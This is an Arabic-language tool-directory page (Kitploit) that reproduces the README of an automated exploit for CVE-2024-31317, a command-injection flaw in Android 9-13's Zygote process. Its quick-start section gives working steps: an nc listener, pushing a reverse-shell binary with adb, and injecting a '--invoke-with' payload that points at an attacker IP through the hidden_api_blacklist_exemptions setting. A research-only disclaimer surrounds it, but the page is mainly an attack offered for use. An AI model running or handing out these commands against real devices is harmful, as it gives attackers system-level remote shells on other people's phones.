Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-31317-Deployer — أداة نشر تلقائية لـ CVE-2024-31317، وهي ثغرة حقن أوامر في Android 9-13. تتضمن حمولة قشرة عكسية وسكربت تجميع وتحليل فني للبحث والتعليم الأمني. | Kitploit
أدوات/GitHubGitHub/kalibb/cve-2024-31317-deployer
أمان أندرويدتحليل الثغرات الأمنيةالاستغلالأمن الجوالالقيادة والسيطرةالتعلم والتعليمتطوير الحمولاتاستغلال الملفات الثنائية
GitHubkalibb/cve-2024-31317-deployer

CVE-2024-31317-Deployer

أداة نشر تلقائية لـ CVE-2024-31317، وهي ثغرة حقن أوامر في Android 9-13. تتضمن حمولة قشرة عكسية وسكربت تجميع وتحليل فني للبحث والتعليم الأمني.

عرض المستودع
12منذ 7 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-31317 Deployer

License Android Status

🔒 بيان البحث الأمني

هذا المشروع مخصص فقط لأغراض البحث الأمني والتعليم. استخدام هذه الأداة في اختبارات غير مصرح بها غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر.

📋 نظرة عامة

CVE-2024-31317 هو ثغرة أمنية خطيرة تؤثر على أجهزة Android من الإصدار 9 إلى 13، وتسمح للتطبيقات التي لديها إذن WRITE_SECURE_SETTINGS بالحصول على صلاحيات مستوى النظام من خلال حقن الأوامر.

يوفر هذا المشروع تحليلاً تقنياً مفصلاً للثغرة، وكوداً لإثبات المفهوم، وأداة نشر آلية.

✨ الميزات الرئيسية

  • 📱 دعم جميع إصدارات Android 9-13
  • 🛠️ نصوص نشر آلية
  • 🔄 اتصال الـ Reverse Shell
  • 📊 وثائق تقنية مفصلة
  • 🎯 تصميم معياري

🐛 تفاصيل الثغرة

  • CVE ID: CVE-2024-31317
  • نوع الثغرة: حقن أوامر
  • مستوى الخطورة: عالٍ (High)
  • درجة CVSS: 7.8
  • المكون المتأثر: عملية Zygote في Android
  • حالة الإصلاح: تم إصلاحها في تحديث أمان Android لشهر يونيو 2024

🎯 نطاق التأثير

الإصدارات المتأثرة

  • ✅ Android 9-13

الإصدارات غير المتأثرة

  • ❌ Android 14+ (تم الإصلاح)
  • ❌ الأجهزة المثبت عليها تحديث أمان يونيو 2024 أو أحدث

📁 هيكل المشروع

root@kitploit:~
CVE-2024-31317-Deployer/
├── README.md
├── LICENSE
├── VULNERABILITY_ANALYSIS.md
├── reverse_shell.c
├── compile.sh
├── payloads/
├── scripts/
└── docs/

🚀 بدء سريع

1. استنساخ المشروع

root@kitploit:~
git clone https://github.com/fcy10012/CVE-2024-31317-Deployer.git
cd CVE-2024-31317-Deployer

2. تجميع الحمولة

root@kitploit:~
chmod +x compile.sh
./compile.sh

3. النشر

root@kitploit:~
# تشغيل المستمع
nc -lvnp 4444

# دفع وتنفيذ
adb push bin/reverse_shell_arm64 /data/local/tmp/reverse_shell
adb shell chmod 755 /data/local/tmp/reverse_shell

# حقن الحمولة
adb shell settings put global hidden_api_blacklist_exemptions "L*\n--invoke-with /data/local/tmp/reverse_shell 192.168.1.100 4444"

# تشغيل الثغرة
adb shell stop && adb shell start

📚 الوثائق

  • تحليل تقني متعمق
  • تعليمات استخدام الحمولة
  • دليل الاستخدام الكامل

⚠️ إخلاء مسؤولية

هذا المشروع مخصص فقط لأغراض البحث الأمني والتعليم. باستخدام هذه الأداة، فإنك توافق على:

  • الامتثال لجميع القوانين واللوائح المعمول بها
  • استخدامها فقط في البحث الأمني المشروع
  • تحمل المسؤولية الكاملة عن أفعالك

📜 الترخيص

هذا المشروع مرخص بموجب رخصة MIT - انظر ملف LICENSE للحصول على التفاصيل

👨‍💻 المؤلف

fcy10012 - GitHub

🙏 شكر وتقدير

المشروع المرجعي: WebLDix/CVE-2024-31317-PoC-Deployer


⭐ إذا كان هذا المشروع مفيداً لك، يرجى منحه نجمة!

تنزيل الأداة